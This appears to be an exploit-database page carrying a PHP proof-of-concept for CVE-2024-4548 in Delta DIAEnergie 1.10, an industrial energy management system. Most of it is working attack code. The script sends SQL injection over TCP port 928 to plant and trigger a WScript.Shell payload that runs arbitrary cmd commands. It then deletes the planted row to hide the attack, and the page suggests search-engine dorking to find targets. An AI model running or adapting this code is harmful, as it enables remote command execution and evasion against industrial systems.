Share
## https://sploitus.com/exploit?id=PACKETSTORM:189531
=============================================================================================================================================
    | # Title     : DIAEnergie 1.10 PHP Code Injection Vulnerability                                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.deltaww.com/en-US/products/DIAEnergie-Industrial-Energy-Management-System/ALL/                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description:  The code attempts to establish a connection with the targeted server over the network.
    
        If the connection is successful, it sends a malicious SQL query to inject commands into the database.
    
        After injection, the script cleans the logs to ensure that the attack is not easily detected.
    	
    	( https://packetstorm.news/files/id/180334/  CVE-2024-4548 )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 114
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class CustomSQLInjection
    {
        const TARGET_PORT = 928;
        const TARGET_HOST = 'target_host'; // ضع عنوان الهدف هنا
    
        private $payload;
    
        public function __construct($cmd)
        {
            // تحديد الحمولة لتنفيذ الأوامر
            $this->payload = "CreateObject(\"WScript.Shell\").Run(\"cmd /c $cmd\")";
        }
    
        public function check()
        {
            try {
                $sock = $this->connect();
                fwrite($sock, 'Who is it?');
                $res = fread($sock, 1024);
    
                if (empty($res)) {
                    echo "Received an empty response.\n";
                    return 'Unknown';
                }
    
                echo "Who is it response: $res\n";
    
                preg_match('/\b\d+\.\d+\.\d+\.\d+\b/', $res, $version);
    
                if (empty($version)) {
                    return 'Detected';
                }
    
                echo "Version retrieved: " . $version[0] . "\n";
    
                if (version_compare($version[0], '1.10.1.8610', '>')) {
                    return 'Safe';
                }
    
                return 'Appears';
    
            } catch (Exception $e) {
                echo "Error: " . $e->getMessage() . "\n";
                return 'Unknown';
            }
        }
    
        public function exploit()
        {
            // حقن الحمولة
            $this->execute_command($this->payload);
        }
    
        private function execute_command($cmd)
        {
            $scname = bin2hex(random_bytes(rand(5, 10)));
    
            echo "Using random script name: $scname\n";
    
            $random_date = date('Y-m-d', rand(2024, 2026)) . '-' . sprintf('%02d', rand(1, 12)) . '-' . sprintf('%02d', rand(1, 29));
            echo "Using random date: $random_date\n";
    
            $random_time = sprintf('%02d:%02d:%02d', rand(0, 23), rand(0, 59), rand(0, 59));
            echo "Using random time: $random_time\n";
    
            try {
                echo "Sending SQL injection...\n";
    
                $sock = $this->connect();
                fwrite($sock, "RecalculateHDMWYC~$random_date $random_time~$random_date $random_time~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'$scname', N'$cmd', N'', N'');--");
                $res = fread($sock, 1024);
    
                if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                    throw new Exception("Unexpected reply from the server: $res");
                }
    
                echo "Injection - Expected response received: $res\n";
    
                fclose($sock);
    
                // Trigger the script execution
                echo "Triggering script execution...\n";
                $sock = $this->connect();
                fwrite($sock, "RecalculateScript~$random_date $random_time~$random_date $random_time~1");
                $res = fread($sock, 1024);
    
                if ($res !== 'Recalculate Script Start!') {
                    throw new Exception("Unexpected reply from the server: $res");
                }
    
                echo "Trigger - Expected response received: $res\n";
    
                fclose($sock);
    
                echo "Script successfully injected, check thy shell.\n";
    
            } catch (Exception $e) {
                echo "Error: " . $e->getMessage() . "\n";
                $this->cleanup($scname);
            }
        }
    
        private function cleanup($scname)
        {
            echo "Cleaning up database...\n";
            try {
                $sock = $this->connect();
                fwrite($sock, "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='$scname';--");
                $res = fread($sock, 1024);
    
                if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                    throw new Exception("Unexpected reply from the server: $res");
                }
    
                echo "Cleanup - Expected response received: $res\n";
                fclose($sock);
    
            } catch (Exception $e) {
                echo "Error during cleanup: " . $e->getMessage() . "\n";
            }
        }
    
        private function connect()
        {
            // الاتصال باستخدام fsockopen
            $sock = fsockopen(self::TARGET_HOST, self::TARGET_PORT, $errno, $errstr, 10);
            if (!$sock) {
                throw new Exception("Connection failed: $errstr ($errno)");
            }
            return $sock;
        }
    }
    
    // تحديد الأمر الذي سيتم تنفيذه
    $cmd = 'dir'; // استبدل هذا الأمر بالأمر الذي ترغب في تنفيذه
    $exploit = new CustomSQLInjection($cmd);
    $exploit->check();
    $exploit->exploit();
    
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================